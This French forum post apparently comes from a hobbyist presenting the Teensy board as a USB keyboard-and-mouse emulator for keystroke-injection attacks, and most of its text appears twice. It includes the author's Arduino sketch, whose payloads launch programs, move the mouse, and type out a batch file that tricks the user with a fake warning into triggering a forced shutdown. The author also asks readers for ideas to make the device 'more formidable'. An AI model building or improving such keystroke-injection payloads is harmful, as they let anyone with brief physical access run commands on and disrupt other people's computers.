Je vais vous présenter le teensy.
Le teensy est un carte de développement qui posséde 23 entrées/sorties digitales ( dont 11 qui sont aussi analogiques). Cette carte est donc utilisée pour certains projets électroniques (vous pouvez en voir quelques uns sur le site des fabricants http://www.pjrc.com/teensy/projects.html ) Le teensy est programmable en C ou depuis le logiciel Arduino (j'utilise ce dernier car plus facile).
arduino-default-software-screen.jpg
(le logiciel arduino)
Mais ce qui nous intéresse principalement ici c'est le fait qu'elle puisse émuler un clavier et une souris. Je m'explique : lorsque le teensy est branché sur un ordinateur il est reconnu comme un clavier et une souris. Ce qui lui permet d’exécuter des commandes et des programmes. Le teensy fut popularisé par Netraguard qui devait tester la sécurité d'une entreprise. Netraguard a donc envoyé à un des employé une souris contenant le teensy et je vous laisse imaginer la suite.
Voici une photo du monstre :
mouse_guts19.jpg
Ensuite il y a eu Irongeek qui fit une présentation de son teensy modifié à la Defcon. Irongeek utilise lui les entrées digitales en y soudant un dipswitch, ce qui lui permet de mettre plusieurs programmes sur son teensy. Il a aussi ajouté une photorésistante. Il créa aussi une librairie pour le teensy qui facilite l’accès au cmd et au terminal sur Osx, linux et windows ( nommée : phukdlib pour : Programmable HID USB Keystroke Dongle library ).
Le teensy a aussi servi à faire du bruteforce de mot de passe bios et iOs.
Mon teensy et son code :
IMAG0099.jpg
Voila le teensy et le dipswitch que je lui ai ajouté.
(Récapitulatif du code : Si switch … activer alors …
1. Lance un notepad et écrit : Teinge est là!!!
2. Crée un fichier bat, le sauvegarde et ferme le notepad. ( je dois maintenant trouver un moyen de récupérer et lancer ce .bat)
3. Bouge la souris aléatoirement sur l'écran.
4. Lance le navigateur et va sur : http://hackademics.fr
5. Lance des calculatrices. ( un peu inutile)
6. Ecrit : Et je viens juste de commencer .... dans un terminal Osx
Pour tous ceux qui seraient intéressés par le teensy vous pouvez l'acheter sur le site officiel : http://www.pjrc.com/teensy/
(compter 2 a 3 semaine de livraison)
Voila un bref aperçu du teensy.
Toutes aides, conseils et critiques sont les bienvenus.
PS : j'aimerais aller plus loin avec mon teensy mais je suis bloqué par mes connaissances en commande pour cmd windows auriez-vous des idées pour rendre ce teensy plus redoutable ? Toute idée est la bienvenue.
PSS : Je suis très intéressé par le hack hardware, ( j'ai déjà lu les tutos de _47 sur le phreaking mais n'étant ni majeur ni propriétaire de la maison et du téléphone je ne peut malheureusement pas les mettre en pratiques ) donc si vous connaissez d'autre chose sur le hardware je suis preneur.
Le teensy est un carte de développement qui posséde 23 entrées/sorties digitales ( dont 11 qui sont aussi analogiques). Cette carte est donc utilisée pour certains projets électroniques (vous pouvez en voir quelques uns sur le site des fabricants http://www.pjrc.com/teensy/projects.html ) Le teensy est programmable en C ou depuis le logiciel Arduino (j'utilise ce dernier car plus facile).
arduino-default-software-screen.jpg
(le logiciel arduino)
Mais ce qui nous intéresse principalement ici c'est le fait qu'elle puisse émuler un clavier et une souris. Je m'explique : lorsque le teensy est branché sur un ordinateur il est reconnu comme un clavier et une souris. Ce qui lui permet d’exécuter des commandes et des programmes. Le teensy fut popularisé par Netraguard qui devait tester la sécurité d'une entreprise. Netraguard a donc envoyé à un des employé une souris contenant le teensy et je vous laisse imaginer la suite.
Voici une photo du monstre :
mouse_guts19.jpg
Ensuite il y a eu Irongeek qui fit une présentation de son teensy modifié à la Defcon. Irongeek utilise lui les entrées digitales en y soudant un dipswitch, ce qui lui permet de mettre plusieurs programmes sur son teensy. Il a aussi ajouté une photorésistante. Il créa aussi une librairie pour le teensy qui facilite l’accès au cmd et au terminal sur Osx, linux et windows ( nommée : phukdlib pour : Programmable HID USB Keystroke Dongle library ).
Le teensy a aussi servi à faire du bruteforce de mot de passe bios et iOs.
Mon teensy et son code :
IMAG0099.jpg
Voila le teensy et le dipswitch que je lui ai ajouté.
Code:
#include <phukdlib.h> int DIP_1 = 5; int DIP_2 = 6; int DIP_3 = 7; int DIP_4 = 8; int DIP_5 = 9; int DIP_6 = 10; int DIP_7 = 11; int DIP_8 = 12; void setup() { pinMode(DIP_1, INPUT_PULLUP); pinMode(DIP_2, INPUT_PULLUP); pinMode(DIP_3, INPUT_PULLUP); pinMode(DIP_4, INPUT_PULLUP); pinMode(DIP_5, INPUT_PULLUP); pinMode(DIP_6, INPUT_PULLUP); pinMode(DIP_7, INPUT_PULLUP); pinMode(DIP_8, INPUT_PULLUP); } void loop() { if (!digitalRead(DIP_1)) { CommandAtRunBarMSWIN("notepad.exe"); delay(1000); Keyboard.println("Teinge est là!!! :)"); delay(1000000) ; } if (!digitalRead(DIP_2)) { CommandAtRunBarMSWIN("notepad.exe"); delay(500); Keyboard.println("@echo off"); Keyboard.println("echo Ce fichier est défectueux et pourrait endomager votre ordinateur, appuyer sur une touche pour le supprimer!"); Keyboard.println("pause"); Keyboard.println("shutdown -f -t"); Keyboard.println("del c:hack.bat!"); Keyboard.set_modifier(MODIFIERKEY_CTRL); Keyboard.set_key1(KEY_S); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.send_now(); // Keyboard.set_modifier(MODIFIERKEY_CTRL); Keyboard.set_key1(KEY_Q); Keyboard.send_now(); Keyboard.set_modifier(0); delay(100); Keyboard.print("hack.bat"); Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); Keyboard.set_modifier(MODIFIERKEY_ALT); Keyboard.set_key1(KEY_F4); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.send_now(); delay(10000000); } if (!digitalRead(DIP_3)) { Mouse.move(random(-100, 100) ,random(-100, 100) ); Mouse.move(random(-100, 100) ,random(-100, 100) ); Mouse.move(random(-100, 100) ,random(-100, 100) );; Mouse.move(random(-100, 100) ,random(-100, 100) ); } if (!digitalRead(DIP_4)) { CommandAtRunBarMSWIN("cmd /c start http://hackademics.fr"); //faut bien faire le lèche botte a un moment delay(10000); } if (!digitalRead(DIP_5)) { Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); Keyboard.set_key1(KEY_R); Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); delay(300); Keyboard.print("calc"); Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); } if (!digitalRead(DIP_6)) { CommandAtRunBarOSX("Terminal"); Keyboard.print("Et je viens juste de commencer ...."); delay(10000); } }
(Récapitulatif du code : Si switch … activer alors …
1. Lance un notepad et écrit : Teinge est là!!!
2. Crée un fichier bat, le sauvegarde et ferme le notepad. ( je dois maintenant trouver un moyen de récupérer et lancer ce .bat)
3. Bouge la souris aléatoirement sur l'écran.
4. Lance le navigateur et va sur : http://hackademics.fr
5. Lance des calculatrices. ( un peu inutile)
6. Ecrit : Et je viens juste de commencer .... dans un terminal Osx
Pour tous ceux qui seraient intéressés par le teensy vous pouvez l'acheter sur le site officiel : http://www.pjrc.com/teensy/
(compter 2 a 3 semaine de livraison)
Voila un bref aperçu du teensy.
Toutes aides, conseils et critiques sont les bienvenus.
PS : j'aimerais aller plus loin avec mon teensy mais je suis bloqué par mes connaissances en commande pour cmd windows auriez-vous des idées pour rendre ce teensy plus redoutable ? Toute idée est la bienvenue.
PSS : Je suis très intéressé par le hack hardware, ( j'ai déjà lu les tutos de _47 sur le phreaking mais n'étant ni majeur ni propriétaire de la maison et du téléphone je ne peut malheureusement pas les mettre en pratiques ) donc si vous connaissez d'autre chose sur le hardware je suis preneur.
Commentaire